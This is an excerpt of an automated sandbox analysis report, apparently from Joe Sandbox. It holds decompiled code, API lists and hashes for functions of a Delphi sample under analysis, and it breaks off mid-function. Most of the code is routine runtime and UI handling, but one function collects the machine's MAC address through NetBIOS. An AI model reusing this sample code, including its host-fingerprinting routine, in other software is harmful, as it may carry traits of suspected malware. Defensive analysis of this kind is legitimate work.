                                                      • Part of subcall function 00403A2C: GetKeyboardType.USER32 ref: 00403A31
                                                      • Part of subcall function 00403A2C: GetKeyboardType.USER32 ref: 00403A3D
                                                    • GetCommandLineA.KERNEL32 ref: 00406BF7
                                                    • GetVersion.KERNEL32 ref: 00406C0B
                                                    • GetVersion.KERNEL32 ref: 00406C1C
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406C58
                                                      • Part of subcall function 00403A5C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                      • Part of subcall function 00403A5C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                      • Part of subcall function 00403A5C: RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                    • GetThreadLocale.KERNEL32 ref: 00406C38
                                                      • Part of subcall function 00406AC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00406B2E), ref: 00406AEE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                    • String ID:
                                                    • API String ID: 3734044017-0
                                                    • Opcode ID: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                    • Instruction ID: fdcee0d7d708edd62114d02ed336596d20e14c9a9bb73fcb5a3f4b26375a27c1
                                                    • Opcode Fuzzy Hash: 87af050cfad424867c9459bcfec1416d8be21a59354ae6f790beb94c2f7b66d5
                                                    • Instruction Fuzzy Hash: 52016DB4414351CAE710FFA7A8063583AA0AB2131DF05583FD541BA2F2FBBC01158B6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00475658 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E00475658(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed char* _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _t79;
				char* _t115;
				void* _t116;
				intOrPtr _t145;
				void* _t152;
				intOrPtr _t155;
				intOrPtr _t156;
				void* _t162;

				_t155 = _t156;
				_t116 = 5;
				do {
					_push(0);
					_push(0);
					_t116 = _t116 - 1;
				} while (_t116 != 0);
				_v8 = __eax;
				_push(_t155);
				_push(0x475868);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				E004049C0(_v8);
				E004049C0( &_v20);
				_t115 = E0040275C(0x40);
				E004032B4(_t115, 0x40);
				_v16 = E0040275C(0x100);
				E004032B4(_v16, 0x100);
				_t152 = E0040275C(0x3c);
				E004032B4(_t152, 0x3c);
				 *_v16 = 0;
				 *_t115 = 0x37;
				 *((intOrPtr*)(_t115 + 4)) = _v16;
				 *((short*)(_t115 + 8)) = 4;
				_push(_t115);
				L00472C18();
				_v12 = 0;
				while(1) {
					E004032B4(_t115, 0x40);
					 *_t115 = 0x32;
					 *((char*)(_t115 + 0x30)) = _v16[_v12 + 1];
					_push(_t115);
					L00472C18();
					E004032B4(_t115, 0x40);
					 *_t115 = 0x33;
					_t79 = _v16[_v12 + 1];
					 *((char*)(_t115 + 0x30)) = _t79;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t152 = _t152;
					 *((intOrPtr*)(_t115 + 4)) = 0x475878;
					 *((short*)(_t115 + 8)) = 0x3c;
					_push(_t115);
					L00472C18();
					if(_t79 == 0 || _t79 == 6) {
						E00409600( &_v24, 2);
						_push(_v24);
						_push(0x475890);
						E00409600( &_v28, 2);
						_push(_v28);
						_push(0x475890);
						E00409600( &_v32, 2);
						_push(_v32);
						_push(0x475890);
						E00409600( &_v36, 2);
						_push(_v36);
						_push(0x475890);
						E00409600( &_v40, 2);
						_push(_v40);
						_push(0x475890);
						E00409600( &_v44, 2);
						_push(_v44);
						E00404D40();
					}
					_v12 = _v12 + 1;
					_t162 = ( *_v16 & 0x000000ff) - _v12;
					if(_t162 <= 0) {
						break;
					}
					E00404DCC(_v20, "00-00-00-00-00-00");
					if(_t162 == 0) {
						continue;
					}
					break;
				}
				E0040277C(_t115);
				E0040277C(_t152);
				E0040277C(_v16);
				E00404A14(_v8, _v20);
				_pop(_t145);
				 *[fs:eax] = _t145;
				_push(0x47586f);
				return E004049E4( &_v44, 7);
			}





















                                                    0x00475659
                                                    0x0047565b
                                                    0x00475660
                                                    0x00475660
                                                    0x00475662
                                                    0x00475664
                                                    0x00475664
                                                    0x0047566a
                                                    0x0047566f
                                                    0x00475670
                                                    0x00475675
                                                    0x00475678
                                                    0x0047567e
                                                    0x00475686
                                                    0x00475695
                                                    0x004756a0
                                                    0x004756af
                                                    0x004756bc
                                                    0x004756cb
                                                    0x004756d6
                                                    0x004756de
                                                    0x004756e1
                                                    0x004756e7
                                                    0x004756ea
                                                    0x004756f0
                                                    0x004756f1
                                                    0x004756f8
                                                    0x004756fb
                                                    0x00475706
                                                    0x0047570b
                                                    0x00475718
                                                    0x0047571b
                                                    0x0047571c
                                                    0x0047572a
                                                    0x0047572f
                                                    0x00475738
                                                    0x0047573c
                                                    0x00475748
                                                    0x00475749
                                                    0x0047574a
                                                    0x0047574b
                                                    0x0047574c
                                                    0x0047574d
                                                    0x00475750
                                                    0x00475756
                                                    0x00475757
                                                    0x0047575e
                                                    0x00475774
                                                    0x00475779
                                                    0x0047577c
                                                    0x0047578e
                                                    0x00475793
                                                    0x00475796
                                                    0x004757a8
                                                    0x004757ad
                                                    0x004757b0
                                                    0x004757c2
                                                    0x004757c7
                                                    0x004757ca
                                                    0x004757dc
                                                    0x004757e1
                                                    0x004757e4
                                                    0x004757f6
                                                    0x004757fb
                                                    0x00475806
                                                    0x00475806
                                                    0x0047580b
                                                    0x00475814
                                                    0x00475817
                                                    0x00000000
                                                    0x00000000
                                                    0x00475821
                                                    0x00475826
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00475826
                                                    0x0047582e
                                                    0x00475835
                                                    0x0047583d
                                                    0x00475848
                                                    0x0047584f
                                                    0x00475852
                                                    0x00475855
                                                    0x00475867

                                                    APIs
                                                    • Netbios.NETAPI32(00000000), ref: 004756F1
                                                    • Netbios.NETAPI32(00000000), ref: 0047571C
                                                    • Netbios.NETAPI32(00000000), ref: 00475757
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Netbios
                                                    • String ID: 00-00-00-00-00-00$<
                                                    • API String ID: 544444789-41023692
                                                    • Opcode ID: 1b3c46c424ce61c2de374a88a3e63ba3c340aecb30e3da8f6094dd15b6fa7177
                                                    • Instruction ID: dc29ca18e00d15a9725c9b3c649b13ae9c6c43c4cf661d243729a07c7496b8e6
                                                    • Opcode Fuzzy Hash: 1b3c46c424ce61c2de374a88a3e63ba3c340aecb30e3da8f6094dd15b6fa7177
                                                    • Instruction Fuzzy Hash: 0A5183346045449BDB01EFA9C882BDEBBF5AF4C304F5584BEE458BB383C6789901CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042AE8C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 95%
                                                    			E0042AE8C(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				struct HPALETTE__* _v12;
				char _v13;
				intOrPtr _v25;
				intOrPtr _v29;
				intOrPtr _v33;
				intOrPtr _v57;
				short _v59;
				short _v61;
				intOrPtr _v65;
				intOrPtr _v69;
				intOrPtr _v73;
				intOrPtr _v77;
				intOrPtr _v89;
				intOrPtr _v93;
				void _v97;
				void* _t44;
				void* _t46;
				intOrPtr _t49;
				void* _t54;
				struct HPALETTE__* _t56;
				void* _t72;
				void* _t74;
				void* _t75;
				struct HDC__* _t76;
				intOrPtr _t97;
				void* _t107;
				void* _t109;
				void* _t110;
				intOrPtr _t112;

				_t107 = _t109;
				_t110 = _t109 + 0xffffffa0;
				_t72 = __edx;
				_v8 = __eax;
				_t44 = L00429FC8(_v8);
				if(_t72 == _t44) {
					L16:
					return _t44;
				} else {
					_t46 = _t72 - 1;
					if(_t46 < 0) {
						_t44 =  *((intOrPtr*)( *_v8 + 0x6c))();
						goto L16;
					} else {
						if(_t46 == 7) {
							_t49 =  *0x49d90c; // 0x422ec0
							_t44 = L00425F28(_t49);
							goto L16;
						} else {
							E004032B4( &_v97, 0x54);
							_t54 = memcpy( &_v97,  *((intOrPtr*)(_v8 + 0x28)) + 0x18, 6 << 2);
							_t112 = _t110 + 0xc;
							_v13 = 0;
							_v77 = 0;
							_v73 = 0x28;
							_v69 = _v93;
							_v65 = _v89;
							_v61 = 1;
							_v59 =  *0x0049B8B3 & 0x000000ff;
							_v12 =  *((intOrPtr*)(_t54 + 0x10));
							_t74 = _t72 - 2;
							if(_t74 == 0) {
								_t56 =  *0x49e894; // 0x5e0807a3
								_v12 = _t56;
							} else {
								_t75 = _t74 - 1;
								if(_t75 == 0) {
									_t76 = E00426060(GetDC(0));
									_v12 = CreateHalftonePalette(_t76);
									_v13 = 1;
									ReleaseDC(0, _t76);
								} else {
									if(_t75 == 2) {
										_v57 = 3;
										_v33 = 0xf800;
										_v29 = 0x7e0;
										_v25 = 0x1f;
									}
								}
							}
							 *[fs:eax] = _t112;
							 *((char*)(_v8 + 0x22)) = L00429AA8( *((intOrPtr*)( *_v8 + 0x64))( *[fs:eax], 0x42afd9, _t107),  &_v97) & 0xffffff00 | _v12 != 0x00000000;
							_pop(_t97);
							 *[fs:eax] = _t97;
							_push(0x42afe0);
							if(_v13 != 0) {
								return DeleteObject(_v12);
							}
							return 0;
						}
					}
				}
			}

































                                                    0x0042ae8d
                                                    0x0042ae8f
                                                    0x0042ae95
                                                    0x0042ae97
                                                    0x0042ae9d
                                                    0x0042aea4
                                                    0x0042afeb
                                                    0x0042aff1
                                                    0x0042aeaa
                                                    0x0042aeac
                                                    0x0042aeae
                                                    0x0042aebd
                                                    0x00000000
                                                    0x0042aeb0
                                                    0x0042aeb2
                                                    0x0042aec5
                                                    0x0042aeca
                                                    0x00000000
                                                    0x0042aeb4
                                                    0x0042aede
                                                    0x0042aef4
                                                    0x0042aef4
                                                    0x0042aef6
                                                    0x0042aefc
                                                    0x0042aeff
                                                    0x0042af09
                                                    0x0042af0f
                                                    0x0042af12
                                                    0x0042af23
                                                    0x0042af2a
                                                    0x0042af2d
                                                    0x0042af30
                                                    0x0042af3d
                                                    0x0042af42
                                                    0x0042af32
                                                    0x0042af32
                                                    0x0042af34
                                                    0x0042af53
                                                    0x0042af5b
                                                    0x0042af5e
                                                    0x0042af65
                                                    0x0042af36
                                                    0x0042af39
                                                    0x0042af6c
                                                    0x0042af73
                                                    0x0042af7a
                                                    0x0042af81
                                                    0x0042af81
                                                    0x0042af39
                                                    0x0042af34
                                                    0x0042af93
                                                    0x0042afb9
                                                    0x0042afbe
                                                    0x0042afc1
                                                    0x0042afc4
                                                    0x0042afcd
                                                    0x00000000
                                                    0x0042afd3
                                                    0x0042afd8
                                                    0x0042afd8
                                                    0x0042aeb2
                                                    0x0042aeae

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0042AF49
                                                    • CreateHalftonePalette.GDI32(00000000,00000000), ref: 0042AF56
                                                    • ReleaseDC.USER32 ref: 0042AF65
                                                    • DeleteObject.GDI32(00000000), ref: 0042AFD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateDeleteHalftoneObjectPaletteRelease
                                                    • String ID: (
                                                    • API String ID: 577518360-3887548279
                                                    • Opcode ID: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                    • Instruction ID: 2a0d3ada1f03d7f2548bc3f3360be5a611323719477d61fc332258d066da6c8f
                                                    • Opcode Fuzzy Hash: 7301114233ef7d42fd27edf1c10dece0a1fbbcbc6a5acff47dc734edbe3872c0
                                                    • Instruction Fuzzy Hash: AE41F470B04208DFDB00DFA8D585B9EB7F6EF49304F9140AAE804A7391C67C5E15DB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00422C88 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00422C88(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x49e668; // 0x400000
				 *0x49b5dc = _t6;
				_t8 =  *0x49b5f0; // 0x422c78
				_t9 =  *0x49e668; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00407540 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x49e668; // 0x400000
						_t20 =  *0x49b5f0; // 0x422c78
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x49b5cc);
				}
				_t13 =  *0x49e668; // 0x400000
				_t24 =  *0x49b5f0; // 0x422c78
				_t22 = E00407A8C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E00422BCC(_a4, _a8));
				}
				return _t22;
			}














                                                    0x00422c8f
                                                    0x00422c94
                                                    0x00422c9d
                                                    0x00422ca3
                                                    0x00422ca9
                                                    0x00422cb1
                                                    0x00422cb3
                                                    0x00422cb6
                                                    0x00422cc4
                                                    0x00422cc6
                                                    0x00422ccc
                                                    0x00422cd2
                                                    0x00422cd2
                                                    0x00422cdc
                                                    0x00422cdc
                                                    0x00422cf2
                                                    0x00422cff
                                                    0x00422d0f
                                                    0x00422d16
                                                    0x00422d27
                                                    0x00422d27
                                                    0x00422d32

                                                    APIs
                                                    • GetClassInfoA.USER32 ref: 00422CA9
                                                    • UnregisterClassA.USER32 ref: 00422CD2
                                                    • RegisterClassA.USER32 ref: 00422CDC
                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 00422D27
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                    • String ID: x,B
                                                    • API String ID: 4025006896-71347176
                                                    • Opcode ID: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                    • Instruction ID: 5edbcaf682720338496e3359f8b598ec737c219f81609156ea6670bddb9c1a51
                                                    • Opcode Fuzzy Hash: cebccb0ec9a9405ea43d2313997cbfa4afe76ef610b176b8fc2697447ba8c785
                                                    • Instruction Fuzzy Hash: E0018E71744204BBDB00EB6AED81F9A7399EB28718F544137F904E73A1D679AC40CBAD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042572C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E0042572C(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t19;
				char _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t38;
				void* _t39;
				void* _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t51;

				_t40 = __edx;
				_t39 = __ecx;
				if(__edx != 0) {
					_t51 = _t51 + 0xfffffff0;
					_t19 = L00403F10(_t19, _t50);
				}
				_t38 = _t40;
				_t46 = _t19;
				L00403BBC(0);
				_t1 = _t46 + 0x38; // 0x38
				L00407198();
				_t47 = E00424C3C(1);
				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
				 *((intOrPtr*)(_t47 + 8)) = 0x425eb0;
				_t5 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
				_t48 = E00425168(1);
				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
				 *((intOrPtr*)(_t48 + 8)) = 0x425ed0;
				_t10 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
				_t49 = E00425434(1);
				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
				 *((intOrPtr*)(_t49 + 8)) = 0x425ef0;
				_t15 = _t46 + 0x38; // 0x38
				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
				_t32 =  *0x4257ec; // 0x0
				 *((char*)(_t46 + 8)) = _t32;
				_t33 =  *0x49e8ec; // 0x3030b08
				E0041AFE4(_t33, _t38, _t39, _t46, _t49);
				_t35 = _t46;
				if(_t38 != 0) {
					L00403F68(_t35);
					_pop( *[fs:0x0]);
				}
				return _t46;
			}


















                                                    0x0042572c
                                                    0x0042572c
                                                    0x00425731
                                                    0x00425733
                                                    0x00425736
                                                    0x00425736
                                                    0x0042573b
                                                    0x0042573d
                                                    0x00425743
                                                    0x00425748
                                                    0x0042574c
                                                    0x0042575d
                                                    0x0042575f
                                                    0x00425762
                                                    0x00425765
                                                    0x0042576c
                                                    0x0042576f
                                                    0x0042577e
                                                    0x00425780
                                                    0x00425783
                                                    0x00425786
                                                    0x0042578d
                                                    0x00425790
                                                    0x0042579f
                                                    0x004257a1
                                                    0x004257a4
                                                    0x004257a7
                                                    0x004257ae
                                                    0x004257b1
                                                    0x004257b4
                                                    0x004257bb
                                                    0x004257c0
                                                    0x004257c5
                                                    0x004257ca
                                                    0x004257cf
                                                    0x004257d3
                                                    0x004257d5
                                                    0x004257da
                                                    0x004257e1
                                                    0x004257e9

                                                    APIs
                                                    • RtlInitializeCriticalSection.KERNEL32(vas,00428B00,?,00000001,00428C96,?,?,?,00429F01,?,?,00429D20,?,0000000E,00000000,?), ref: 0042574C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalInitializeSection
                                                    • String ID: h7B$h8B$vas$5B
                                                    • API String ID: 32694325-2931570110
                                                    • Opcode ID: bd3b095f9042d2604a0f53fc41302a85decb916e5816816f9a96bdd2596773ca
                                                    • Instruction ID: 3f3694d375962d4255fc29ac861639cc4656e31162b1a28f9c4b0cd7577d53a2
                                                    • Opcode Fuzzy Hash: bd3b095f9042d2604a0f53fc41302a85decb916e5816816f9a96bdd2596773ca
                                                    • Instruction Fuzzy Hash: E9118EB1A01B129FC320EF2AE840985FBF9BF84314384853FE449C7B11D779A9558B94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044E150 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E0044E150(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x49de44; // 0x49e744
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0044E4D4(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) + ((E0044E4D4(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                                    0x0044e152
                                                    0x0044e155
                                                    0x0044e157
                                                    0x0044e160
                                                    0x0044e177
                                                    0x0044e179
                                                    0x0044e180
                                                    0x0044e18c
                                                    0x0044e190
                                                    0x0044e19e
                                                    0x0044e1a5
                                                    0x0044e1a9
                                                    0x0044e1bb
                                                    0x0044e1c0
                                                    0x0044e1de
                                                    0x0044e1e2
                                                    0x0044e1f0
                                                    0x0044e1f7
                                                    0x00000000
                                                    0x0044e1fd
                                                    0x0044e1f7
                                                    0x0044e1c0
                                                    0x0044e1a5
                                                    0x0044e20a

                                                    APIs
                                                    • GetMenuItemInfoA.USER32 ref: 0044E19E
                                                    • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0044E1F0
                                                    • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 0044E1FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw
                                                    • String ID: DI$P
                                                    • API String ID: 3227129158-1383934172
                                                    • Opcode ID: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                    • Instruction ID: 3c7080e089ef200bda1d0293621365d90923fd6ea2d15a2cda29d63b16e16469
                                                    • Opcode Fuzzy Hash: 47aab54365fcd0871cb6339b6fa52b1f3853022d14864fa6dad1c364d49d802f
                                                    • Instruction Fuzzy Hash: 2B1190716052006BE3109B29CC85B4A76D8BB85324F14866AF5A4CB3DAD679D844C74A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402944 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00402944(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E00404C30(_t25, 0x105,  &_v532);
			}










                                                    0x0040294c
                                                    0x0040294e
                                                    0x00402952
                                                    0x0040295c
                                                    0x0040295f
                                                    0x00402964
                                                    0x00402976
                                                    0x0040297c
                                                    0x0040297c
                                                    0x0040298b
                                                    0x00402992
                                                    0x0040299c
                                                    0x0040299c
                                                    0x004029b9

                                                    APIs
                                                    • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 00402976
                                                    • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040297C
                                                    • GetCurrentDirectoryA.KERNEL32(00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE,?,?,?,?,00000000), ref: 0040298B
                                                    • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,00000000,00409F51,00477B3E,00400000,00000000,0000000A,00000000,00477DAE), ref: 0040299C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: :
                                                    • API String ID: 1611563598-336475711
                                                    • Opcode ID: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                    • Instruction ID: c5c7b0dff09aeac35822bcb6cbe030b0537c54a7cf5c2cde62247dac08ae10a0
                                                    • Opcode Fuzzy Hash: 1249958c054fa4984ce3416e04740fefc0778df6b06032fbb527210971bdf7ac
                                                    • Instruction Fuzzy Hash: 7DF096662497C01EE310E6698856BDB72DC8B55304F04442EBACCD73C2E6B8894457A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004166D4 Relevance: 7.8, APIs: 5, Instructions: 334COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E004166D4(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed int _v12;
				char _v13;
				signed int _v16;
				signed int _v18;
				void* _v24;
				void* _v28;
				signed int _v44;
				void* __ebp;
				signed short _t136;
				signed short* _t256;
				intOrPtr _t307;
				intOrPtr _t310;
				intOrPtr _t318;
				intOrPtr _t325;
				intOrPtr _t333;
				signed int _t338;
				void* _t346;
				void* _t348;
				intOrPtr _t349;

				_t353 = __fp0;
				_t346 = _t348;
				_t349 = _t348 + 0xffffffd8;
				_v12 = __ecx;
				_v8 = __edx;
				_t256 = __eax;
				_v13 = 1;
				_t338 =  *((intOrPtr*)(__eax));
				if((_t338 & 0x00000fff) >= 0x10f) {
					_t136 =  *_v8;
					if(_t136 != 0) {
						if(_t136 != 1) {
							if(E0041713C(_t338,  &_v24) != 0) {
								_push( &_v18);
								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
									_t341 =  *_v8;
									if(( *_v8 & 0x00000fff) >= 0x10f) {
										if(E0041713C(_t341,  &_v28) != 0) {
											_push( &_v16);
											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
												E0041024C(0xb);
												goto L46;
											} else {
												if( *_t256 == _v16) {
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													goto L46;
												} else {
													_push( &_v44);
													L0040F318();
													_push(_t346);
													_push(0x416ab5);
													_push( *[fs:eax]);
													 *[fs:eax] = _t349;
													_t268 = _v16 & 0x0000ffff;
													E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
													if(_v44 != _v16) {
														E0041015C(_t268);
													}
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													_pop(_t307);
													 *[fs:eax] = _t307;
													_push(0x416ae8);
													return E004109E8( &_v44);
												}
											}
										} else {
											E0041024C(0xb);
											goto L46;
										}
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4169ff);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t273 =  *_v8 & 0x0000ffff;
										E00411330( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
										if( *_v8 != _v44) {
											E0041015C(_t273);
										}
										_v13 = E00416548( &_v44, _v12, _v8, _t353);
										_pop(_t310);
										 *[fs:eax] = _t310;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								} else {
									if( *_v8 == _v18) {
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x41695d);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t278 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
										if(_v44 != _v18) {
											E0041015C(_t278);
										}
